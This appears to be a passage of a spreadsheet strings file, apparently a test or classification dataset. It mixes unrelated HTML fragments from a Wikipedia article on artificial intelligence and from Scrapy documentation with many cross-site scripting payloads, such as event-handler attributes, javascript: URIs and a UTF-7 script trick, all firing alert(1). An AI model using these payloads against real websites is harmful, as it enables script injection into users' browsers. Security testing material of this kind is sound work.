    <t xml:space="preserve">             &lt;/li&gt;&lt;li style="min-height: 31px;"&gt;&lt;span style="display: inline-block; width: 31px; line-height: 31px; vertical-align: middle; text-align: center;"&gt;&lt;img alt="" src="//upload.wikimedia.org/wikipedia/commons/thumb/f/ff/Wikidata-logo.svg/27px-Wikidata-logo.svg.png" decoding="async" width="27" height="15" style="vertical-align: middle" srcset="//upload.wikimedia.org/wikipedia/commons/thumb/f/ff/Wikidata-logo.svg/41px-Wikidata-logo.svg.png 1.5x, //upload.wikimedia.org/wikipedia/commons/thumb/f/ff/Wikidata-logo.svg/54px-Wikidata-logo.svg.png 2x" data-file-width="1050" data-file-height="590" /&gt; </t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;a href="#CITEREFMarkoff2011"&gt;Markoff 2011 &lt;/a&gt;. </t>
  </si>
  <si>
    <t xml:space="preserve">      &lt;nav class="wy-nav-top" aria-label="top navigation"&gt;        </t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;font ondragover=alert(1) contenteditable&gt;drop here&lt;/font&gt;</t>
  </si>
  <si>
    <t>&lt;dialog id=x tabindex=1 onbeforedeactivate=alert(1)&gt;&lt;/dialog&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;details oncopy="alert(1)" contenteditable&gt;test&lt;/details&gt;</t>
  </si>
  <si>
    <t>&lt;object onmouseup="alert(1)"&gt;test&lt;/object&gt;</t>
  </si>
  <si>
    <t>&lt;base draggable="true" ondragenter="alert(1)"&gt;test&lt;/base&gt;</t>
  </si>
  <si>
    <t>&lt;hgroup id=x tabindex=1 onbeforeactivate=alert(1)&gt;&lt;/hgroup&gt;</t>
  </si>
  <si>
    <t>&lt;colgroup onkeydown="alert(1)" contenteditable&gt;test&lt;/colgroup&gt;</t>
  </si>
  <si>
    <t>&lt;div class="reflist" style="list-style-type: lower-alpha;"&gt;</t>
  </si>
  <si>
    <t>&lt;font onbeforecut="alert(1)" contenteditable&gt;test&lt;/font&gt;</t>
  </si>
  <si>
    <t>&lt;li class="toctree-l1"&gt;&lt;a class="reference internal" href="intro/tutorial.html"&gt;Scrapy Tutorial&lt;/a&gt;&lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;time onmousedown="alert(1)"&gt;test&lt;/time&gt;</t>
  </si>
  <si>
    <t>&lt;menuitem onpointerenter=alert(1)&gt;XSS&lt;/menuitem&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;&lt;a href="/w/index.php?title=Artificial_intelligence&amp;amp;action=edit&amp;amp;section=58" title="Edit section: Machine ethics"&gt;edit &lt;/a&gt;&lt;span class="mw-editsection-bracket"&gt;] </t>
  </si>
  <si>
    <t>&lt;IMG SRC=javascript:alert(&amp;quot;&amp;quot;)&gt;</t>
  </si>
  <si>
    <t>&lt;track id=x tabindex=1 onactivate=alert(1)&gt;&lt;/track&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;cite class="citation web"&gt;Jeff Larson, Julia Angwin (23 May 2016). &lt;a rel="nofollow" class="external text" href="https://www.propublica.org/article/how-we-analyzed-the-compas-recidivism-algorithm"&gt;"How We Analyzed the COMPAS Recidivism Algorithm" &lt;/a&gt;. &lt;i&gt;ProPublica &lt;/i&gt;&lt;span class="reference-accessdate"&gt;. Retrieved &lt;span class="nowrap"&gt;23 July </t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color: red;}&lt;/style&gt;&lt;plaintext id=x style="transition:color 10s" ontransitioncancel=alert(1)&gt;&lt;/plaintext&gt;</t>
  </si>
  <si>
    <t xml:space="preserve"> &lt;p&gt;Many of the problems in this article may also require general intelligence, if machines are to solve the problems as well as people do. For example, even specific straightforward tasks, like &lt;a href="/wiki/Machine_translation" title="Machine translation"&gt;machine translation &lt;/a&gt;, require that a machine read and write in both languages (&lt;a href="#Natural_language_processing"&gt;NLP &lt;/a&gt;), follow the author's argument (&lt;a href="#Deduction,_reasoning,_problem_solving"&gt;reason &lt;/a&gt;), know what is being talked about (&lt;a href="#Knowledge_representation"&gt;knowledge &lt;/a&gt;), and faithfully reproduce the author's original intent (&lt;a href="#Social_intelligence"&gt;social intelligence &lt;/a&gt;). A problem like machine translation is considered "&lt;a href="/wiki/AI-complete" title="AI-complete"&gt;AI-complete &lt;/a&gt;", because all of these problems need to be solved simultaneously in order to reach human-level machine performance.</t>
  </si>
  <si>
    <t xml:space="preserve"> &lt;/div&gt; &lt;/td&gt; &lt;/tr&gt; &lt;/tbody&gt; &lt;/table&gt; &lt;/div&gt; &lt;/div&gt; &lt;/td&gt; &lt;/tr&gt; &lt;/tbody&gt; &lt;/table&gt; &lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;s onmouseleave="alert(1)"&gt;test&lt;/s&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li&gt;&lt;cite id="CITEREFvan_der_WaltBernard2006" class="citation web"&gt;van der Walt, Christiaan; Bernard, Etienne (2006). &lt;a rel="nofollow" class="external text" href="https://web.archive.org/web/20090325194051/http://www.patternrecognition.co.za/publications/cvdwalt_data_characteristics_classifiers.pdf"&gt;"Data characteristics that determine classifier performance" &lt;/a&gt; &lt;span class="cs1-format"&gt;(PDF) </t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;q ondragover=alert(1) contenteditable&gt;drop here&lt;/q&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;Can a machine have a &lt;a href="/wiki/Mind" title="Mind"&gt;mind &lt;/a&gt;, &lt;a href="/wiki/Consciousness" title="Consciousness"&gt;consciousness &lt;/a&gt; and &lt;a href="/wiki/Philosophy_of_mind" title="Philosophy of mind"&gt;mental states &lt;/a&gt; in exactly the same sense that human beings do? Can a machine be &lt;a href="/wiki/Sentience" title="Sentience"&gt;sentient &lt;/a&gt;, and thus deserve certain rights? Can a machine &lt;a href="/wiki/Intention" title="Intention"&gt;intentionally &lt;/a&gt; cause harm? &lt;/li&gt; &lt;/ol&gt;</t>
  </si>
  <si>
    <t>&lt;header oncut="alert(1)" contenteditable&gt;test&lt;/header&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li&gt;&lt;cite id="CITEREFKatz2012" class="citation magazine"&gt;Katz, Yarden (1 November 2012). &lt;a rel="nofollow" class="external text" href="https://www.theatlantic.com/technology/archive/2012/11/noam-chomsky-on-where-artificial-intelligence-went-wrong/261637/?single_page=true"&gt;"Noam Chomsky on Where Artificial Intelligence Went Wrong" &lt;/a&gt;. &lt;i&gt;The Atlantic &lt;/i&gt;&lt;span class="reference-accessdate"&gt;. Retrieved &lt;span class="nowrap"&gt;26 October </t>
  </si>
  <si>
    <t>&lt;link oncopy="alert(1)" contenteditable&gt;test&lt;/link&gt;</t>
  </si>
  <si>
    <t>&lt;shadow onblur=alert(1) tabindex=1 id=x&gt;&lt;/shadow&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	&lt;h3 &gt;</t>
  </si>
  <si>
    <t>&lt;keygen onkeydown="alert(1)" contenteditable&gt;test&lt;/keygen&gt;</t>
  </si>
  <si>
    <t>&lt;body onbeforeprint=alert(1)&gt;</t>
  </si>
  <si>
    <t>&lt;ol onclick="alert(1)"&gt;test&lt;/ol&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	&lt;a href="/w/index.php?title=Artificial_intelligence&amp;amp;action=edit&amp;amp;section=9" title="Edit section: Natural language processing"&gt;edit &lt;/a&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	&lt;ul &gt;</t>
  </si>
  <si>
    <t>&lt;select onfocusout=alert(1) id=x&gt;&lt;/select&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;nextid onmousedown="alert(1)"&gt;test&lt;/nextid&gt;</t>
  </si>
  <si>
    <t>&lt;HEAD&gt;&lt;META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"&gt; &lt;/HEAD&gt;+ADw-SCRIPT+AD4-alert('')</t>
  </si>
  <si>
    <t>&lt;tbody onpointermove=alert(1)&gt;XSS&lt;/tbody&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">        &lt;dt&gt;Downloads&lt;/dt&gt;      </t>
  </si>
  <si>
    <t>&lt;figcaption id=x tabindex=1 onbeforeactivate=alert(1)&gt;&lt;/figcaption&gt;</t>
  </si>
  <si>
    <t>&lt;IMG LOWSRC="javascript:alert('')"&gt;</t>
  </si>
  <si>
    <t>&lt;source onfocusout=alert(1) tabindex=1 id=x&gt;&lt;/source&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;dir onkeyup="alert(1)" contenteditable&gt;test&lt;/dir&gt;</t>
  </si>
  <si>
    <t>&lt;col id=x tabindex=1 onfocusin=alert(1)&gt;&lt;/col&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Knowledge_engineering" title="Knowledge engineering"&gt;Knowledge engineering &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-FOOTNOTEDomingos2015Chapter_7-64"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-FOOTNOTEDomingos2015Chapter_7_64-0"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;pre onpointermove=alert(1)&gt;XSS&lt;/pre&gt;</t>
  </si>
  <si>
    <t>&lt;col onmouseout="alert(1)"&gt;test&lt;/col&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;&lt;a href="/w/index.php?title=Artificial_intelligence&amp;amp;action=edit&amp;amp;section=73" title="Edit section: AI textbooks"&gt;edit &lt;/a&gt;&lt;span class="mw-editsection-bracket"&gt;] </t>
  </si>
  <si>
    <t>&lt;html draggable="true" ondragleave="alert(1)"&gt;test&lt;/html&gt;</t>
  </si>
  <si>
    <t>&lt;hgroup id=x tabindex=1 ondeactivate=alert(1)&gt;&lt;/hgroup&gt;&lt;input id=y autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {transform: rotate(180deg);}&lt;/style&gt;&lt;rb id=x style="transition:transform 2s" ontransitionrun=alert(1)&gt;&lt;/rb&gt;</t>
  </si>
  <si>
    <t>&lt;style onmouseenter="alert(1)"&gt;test&lt;/style&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;&lt;/code&gt;&lt;/a&gt; and &lt;a class="reference external" href="https://docs.python.org/3/library/asyncio.html#module-asyncio" title="(in Python v3.8)"&gt;&lt;code class="xref py py-mod docutils literal notranslate"&gt;&lt;span class="pre"&gt;asyncio</t>
  </si>
  <si>
    <t>&lt;iframe onmouseover="alert(1)"&gt;test&lt;/iframe&gt;</t>
  </si>
  <si>
    <t>&lt;input draggable="true" ondragenter="alert(1)"&gt;test&lt;/input&gt;</t>
  </si>
  <si>
    <t>&lt;output onpointerover=alert(1)&gt;XSS&lt;/output&gt;</t>
  </si>
  <si>
    <t>&lt;form id=x tabindex=1 onfocusin=alert(1)&gt;&lt;/form&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;The act of doling out rewards can itself be formalized or automated into a "&lt;a href="/wiki/Reward_function" class="mw-redirect" title="Reward function"&gt;reward function &lt;/a&gt;". </t>
  </si>
  <si>
    <t>&lt;html draggable="true" ondragenter="alert(1)"&gt;test&lt;/html&gt;</t>
  </si>
  <si>
    <t>&lt;progress onkeydown="alert(1)" contenteditable&gt;test&lt;/progress&gt;</t>
  </si>
  <si>
    <t>&lt;marquee onkeydown="alert(1)" contenteditable&gt;test&lt;/marquee&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/General-purpose_computing_on_graphics_processing_units" title="General-purpose computing on graphics processing units"&gt;GPGPU &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color:red;}&lt;/style&gt;&lt;data id=x style="transition:color 1s" ontransitionend=alert(1)&gt;&lt;/data&gt;</t>
  </si>
  <si>
    <t>&lt;option onpointerdown=alert(1)&gt;XSS&lt;/option&gt;</t>
  </si>
  <si>
    <t>&lt;html oncut="alert(1)" contenteditable&gt;test&lt;/html&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Female_gendering_of_AI_technologies" title="Female gendering of AI technologies"&gt;Female gendering of AI technologies &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="#CITEREFRussellNorvig2003"&gt;Russell &amp;amp; Norvig 2003 &lt;/a&gt;, p.&amp;#160;19 &lt;/li&gt; &lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Ubiquitous_computing" title="Ubiquitous computing"&gt;Ubiquitous computing &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;ul ondrop=alert(1) contenteditable&gt;drop here&lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;sub style="animation-name:x" onanimationstart="alert(1)"&gt;&lt;/sub&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color: red;}&lt;/style&gt;&lt;ul id=x style="transition:color 10s" ontransitioncancel=alert(1)&gt;&lt;/ul&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li&gt;&lt;a href="/wiki/Logical_atomism" title="Logical atomism"&gt;Logical atomism &lt;/a&gt;&lt;span class="nowrap"&gt;&amp;#160; </t>
  </si>
  <si>
    <t>&lt;ul&gt;&lt;li&gt;&lt;a href="#CITEREFMinsky2006"&gt;Minsky 2006 &lt;/a&gt; &lt;/li&gt; &lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;command draggable="true" ondragenter="alert(1)"&gt;test&lt;/command&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;noframes style="animation-name:x" onanimationend="alert(1)"&gt;&lt;/noframes&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color: red;}&lt;/style&gt;&lt;tbody id=x style="transition:color 10s" ontransitioncancel=alert(1)&gt;&lt;/tbody&gt;</t>
  </si>
  <si>
    <t>&lt;svg&gt;&lt;mark onload=alert(1)&gt;&lt;/mark&gt;</t>
  </si>
  <si>
    <t>&lt;button onclick="alert(1)"&gt;test&lt;/button&gt;</t>
  </si>
  <si>
    <t>&lt;sup onpointerout=alert(1)&gt;XSS&lt;/sup&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;h3&gt;&lt;span class="mw-headline" id="Social_intelligence"&gt;Social intelligence </t>
  </si>
  <si>
    <t>&lt;ins id=x tabindex=1 onbeforeactivate=alert(1)&gt;&lt;/ins&gt;</t>
  </si>
  <si>
    <t>&lt;tfoot onmouseup="alert(1)"&gt;test&lt;/tfoot&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Business_process_automation" title="Business process automation"&gt;Business process automation &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;big onpointerdown=alert(1)&gt;XSS&lt;/big&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">  &lt;link rel="stylesheet" href="_static/css/tooltipster-sideTip-shadow.min.css" type="text/css" /&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {transform: rotate(180deg);}&lt;/style&gt;&lt;thead id=x style="transition:transform 2s" ontransitionrun=alert(1)&gt;&lt;/thead&gt;</t>
  </si>
  <si>
    <t>&lt;details onmousemove="alert(1)"&gt;test&lt;/details&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;&lt;/a&gt;&lt;/dt&gt;&lt;dd&gt;Tune Scrapy for crawling a lot domains in parallel.&lt;/dd&gt;</t>
  </si>
  <si>
    <t>&lt;q draggable="true" ondrag="alert(1)"&gt;test&lt;/q&gt;</t>
  </si>
  <si>
    <t>&lt;div onmouseenter="alert(1)"&gt;test&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;abbr onbeforecut="alert(1)" contenteditable&gt;test&lt;/abbr&gt;</t>
  </si>
  <si>
    <t>&lt;a href="/wiki/Machine_perception" title="Machine perception"&gt;Machine perception &lt;/a&gt;:</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}&lt;/style&gt;&lt;header id=x style="position:absolute;" onanimationcancel="alert(1)"&gt;&lt;/header&gt;</t>
  </si>
  <si>
    <t>&lt;li onkeypress="alert(1)" contenteditable&gt;test&lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Valentino_Braitenberg" title="Valentino Braitenberg"&gt;Valentin Braitenberg &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;input id=x onfocusin=alert(1)&gt;</t>
  </si>
  <si>
    <t>&lt;ul draggable="true" ondragleave="alert(1)"&gt;test&lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;applet style="animation-name:x" onanimationend="alert(1)"&gt;&lt;/applet&gt;</t>
  </si>
  <si>
    <t>&lt;img onblur=alert(1) tabindex=1 id=x&gt;&lt;/img&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;td onpointerover=alert(1)&gt;XSS&lt;/td&gt;</t>
  </si>
  <si>
    <t>&lt;h2&gt;Getting help&lt;a class="headerlink" href="#getting-help" title="Permalink to this headline"&gt;¶&lt;/a&gt;&lt;/h2&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;cite class="citation web"&gt;Brown, Eileen. &lt;a rel="nofollow" class="external text" href="https://www.zdnet.com/article/half-of-americans-do-not-believe-deepfake-news-could-target-them-online/"&gt;"Half of Americans do not believe deepfake news could target them online" &lt;/a&gt;. &lt;i&gt;ZDNet &lt;/i&gt;&lt;span class="reference-accessdate"&gt;. Retrieved &lt;span class="nowrap"&gt;3 December </t>
  </si>
  <si>
    <t>&lt;time onmouseleave="alert(1)"&gt;test&lt;/time&gt;</t>
  </si>
  <si>
    <t>&lt;listing onbeforepaste="alert(1)" contenteditable&gt;test&lt;/listing&gt;</t>
  </si>
  <si>
    <t>&lt;dfn onpointerleave=alert(1)&gt;XSS&lt;/dfn&gt;</t>
  </si>
  <si>
    <t>&lt;dialog onblur=alert(1) tabindex=1 id=x&gt;&lt;/dialog&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;script onmouseup="alert(1)"&gt;test&lt;/script&gt;</t>
  </si>
  <si>
    <t>&lt;basefont onblur=alert(1) tabindex=1 id=x&gt;&lt;/basefont&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li&gt;&lt;cite id="CITEREFLeggHutter2007" class="citation techreport"&gt;Legg, Shane; Hutter, Marcus (15 June 2007). &lt;i&gt;A Collection of Definitions of Intelligence &lt;/i&gt; (Technical report). &lt;a href="/wiki/IDSIA" class="mw-redirect" title="IDSIA"&gt;IDSIA &lt;/a&gt;. &lt;a href="/wiki/ArXiv" title="ArXiv"&gt;arXiv &lt;/a&gt;:&lt;span class="cs1-lock-free" title="Freely accessible"&gt;&lt;a rel="nofollow" class="external text" href="//arxiv.org/abs/0706.3639"&gt;0706.3639 &lt;/a&gt; </t>
  </si>
  <si>
    <t>&lt;hr onkeydown="alert(1)" contenteditable&gt;test&lt;/hr&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}&lt;/style&gt;&lt;picture id=x style="position:absolute;" onanimationcancel="alert(1)"&gt;&lt;/picture&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="toctext"&gt;Basics </t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/File:Socrates.png" class="image"&gt;&lt;img alt="Socrates.png" src="//upload.wikimedia.org/wikipedia/commons/thumb/c/cd/Socrates.png/18px-Socrates.png" decoding="async" width="18" height="28" class="noviewer" srcset="//upload.wikimedia.org/wikipedia/commons/thumb/c/cd/Socrates.png/27px-Socrates.png 1.5x, //upload.wikimedia.org/wikipedia/commons/thumb/c/cd/Socrates.png/36px-Socrates.png 2x" data-file-width="326" data-file-height="500" /&gt; &lt;/a&gt; &lt;a href="/wiki/Portal:Philosophy" title="Portal:Philosophy"&gt;Philosophy&amp;#32;portal &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes slidein {}&lt;/style&gt;&lt;audio style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"&gt;&lt;/audio&gt;</t>
  </si>
  <si>
    <t>&lt;svg id=x tabindex=1 onbeforedeactivate=alert(1)&gt;&lt;/svg&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;source onmouseout="alert(1)"&gt;test&lt;/source&gt;</t>
  </si>
  <si>
    <t>&lt;tfoot onpointerover=alert(1)&gt;XSS&lt;/tfoot&gt;</t>
  </si>
  <si>
    <t>&lt;p onmouseout="alert(1)"&gt;test&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;i onblur=alert(1) tabindex=1 id=x&gt;&lt;/i&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;h4&gt;&lt;span class="mw-headline" id="Social_justice"&gt;Social justice </t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-336"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-336"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;rp id=x tabindex=1 onfocusin=alert(1)&gt;&lt;/rp&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Digital_organism" title="Digital organism"&gt;Digital organism &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;rt style="animation-name:x" onanimationend="alert(1)"&gt;&lt;/rt&gt;</t>
  </si>
  <si>
    <t>&lt;blink onmouseout="alert(1)"&gt;test&lt;/blink&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;. &lt;i&gt;Journal of Informetrics &lt;/i&gt;. &lt;b&gt;4 &lt;/b&gt; (4): 447–459. &lt;a href="/wiki/Digital_object_identifier" title="Digital object identifier"&gt;doi &lt;/a&gt;:&lt;a rel="nofollow" class="external text" href="https://doi.org/10.1016%2Fj.joi.2010.04.001"&gt;10.1016/j.joi.2010.04.001 &lt;/a&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;amp;rft.genre=article&amp;amp;rft.jtitle=Journal+of+Informetrics&amp;amp;rft.atitle=The+development+of+an+AI+journal+ranking+based+on+the+revealed+preference+approach&amp;amp;rft.volume=4&amp;amp;rft.issue=4&amp;amp;rft.pages=447-459&amp;amp;rft.date=2010&amp;amp;rft_id=info%3Adoi%2F10.1016%2Fj.joi.2010.04.001&amp;amp;rft.aulast=Serenko&amp;amp;rft.aufirst=Alexander&amp;amp;rft_id=http%3A%2F%2Fwww.aserenko.com%2Fpapers%2FJOI_Serenko_AI_Journal_Ranking_Published.pdf&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-391"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-391"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Computational_engineering" title="Computational engineering"&gt;Computational engineering &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;time draggable="true" ondragstart="alert(1)"&gt;test&lt;/time&gt;</t>
  </si>
  <si>
    <t>&lt;code onmousedown="alert(1)"&gt;test&lt;/code&gt;</t>
  </si>
  <si>
    <t>&lt;content id=x tabindex=1 onfocus=alert(1)&gt;&lt;/content&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;var ondragover=alert(1) contenteditable&gt;drop here&lt;/var&gt;</t>
  </si>
  <si>
    <t>&lt;li class="toctree-l1"&gt;&lt;a class="reference internal" href="topics/logging.html"&gt;Logging&lt;/a&gt;&lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;ul&gt;&lt;li&gt;&lt;a href="#CITEREFTuring1950"&gt;Turing 1950 &lt;/a&gt; under "(2) The Mathematical Objection" &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;svg&gt;&lt;video onload=alert(1)&gt;&lt;/video&gt;</t>
  </si>
  <si>
    <t>&lt;acronym onpointerdown=alert(1)&gt;XSS&lt;/acronym&gt;</t>
  </si>
  <si>
    <t>&lt;li class="toctree-l1"&gt;&lt;a class="reference internal" href="topics/shell.html"&gt;Scrapy shell&lt;/a&gt;&lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;data id=x tabindex=1 onactivate=alert(1)&gt;&lt;/data&gt;</t>
  </si>
  <si>
    <t>&lt;br onbeforepaste="alert(1)" contenteditable&gt;test&lt;/br&gt;</t>
  </si>
  <si>
    <t>"&gt;&lt;img src="x:x" onerror="alert()"&gt;</t>
  </si>
  <si>
    <t>&lt;blockquote oncut="alert(1)" contenteditable&gt;test&lt;/blockquote&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;&lt;span class="mw-editsection"&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Occasionalism" title="Occasionalism"&gt;Occasionalism &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">     &lt;script type="text/javascript" id="documentation_options" data-url_root="./" src="_static/documentation_options.js"&gt;&lt;/script&gt;</t>
  </si>
  <si>
    <t>&lt;shadow draggable="true" ondragenter="alert(1)"&gt;test&lt;/shadow&gt;</t>
  </si>
  <si>
    <t>&lt;listing onkeyup="alert(1)" contenteditable&gt;test&lt;/listing&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;amp;rft.genre=unknown&amp;amp;rft.jtitle=Bulletin+of+the+Atomic+Scientists&amp;amp;rft.atitle=Is+artificial+intelligence+really+an+existential+threat+to+humanity%3F&amp;amp;rft.date=2015-08-09&amp;amp;rft_id=http%3A%2F%2Fthebulletin.org%2Fartificial-intelligence-really-existential-threat-humanity8577&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;head style="animation-name:x" onanimationend="alert(1)"&gt;&lt;/head&gt;</t>
  </si>
  <si>
    <t>&lt;progress onmouseout="alert(1)"&gt;test&lt;/progress&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Program_synthesis" title="Program synthesis"&gt;Program synthesis &lt;/a&gt; &lt;/li&gt; &lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Formal_methods" title="Formal methods"&gt;Formal methods &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;strike onmousemove="alert(1)"&gt;test&lt;/strike&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">    &lt;p&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="#CITEREFNRC1999"&gt;NRC 1999 &lt;/a&gt;, pp.&amp;#160;212–213 &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;dt oncut="alert(1)" contenteditable&gt;test&lt;/dt&gt;</t>
  </si>
  <si>
    <t>&lt;li class="toctree-l1"&gt;&lt;a class="reference internal" href="topics/broad-crawls.html"&gt;Broad Crawls&lt;/a&gt;&lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;svg&gt;&lt;article onload=alert(1)&gt;&lt;/article&gt;</t>
  </si>
  <si>
    <t>&lt;li class="toctree-l1"&gt;&lt;a class="reference internal" href="topics/spider-middleware.html"&gt;Spider Middleware&lt;/a&gt;&lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;rp oncopy="alert(1)" contenteditable&gt;test&lt;/rp&gt;</t>
  </si>
  <si>
    <t>&lt;dd onpointerleave=alert(1)&gt;XSS&lt;/dd&gt;</t>
  </si>
  <si>
    <t>&lt;object onblur=alert(1) tabindex=1 id=x&gt;&lt;/object&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>The &lt;a href="/wiki/Turing_test" title="Turing test"&gt;Turing test &lt;/a&gt;:&lt;br /&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Elon_Musk" title="Elon Musk"&gt;Elon Musk &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
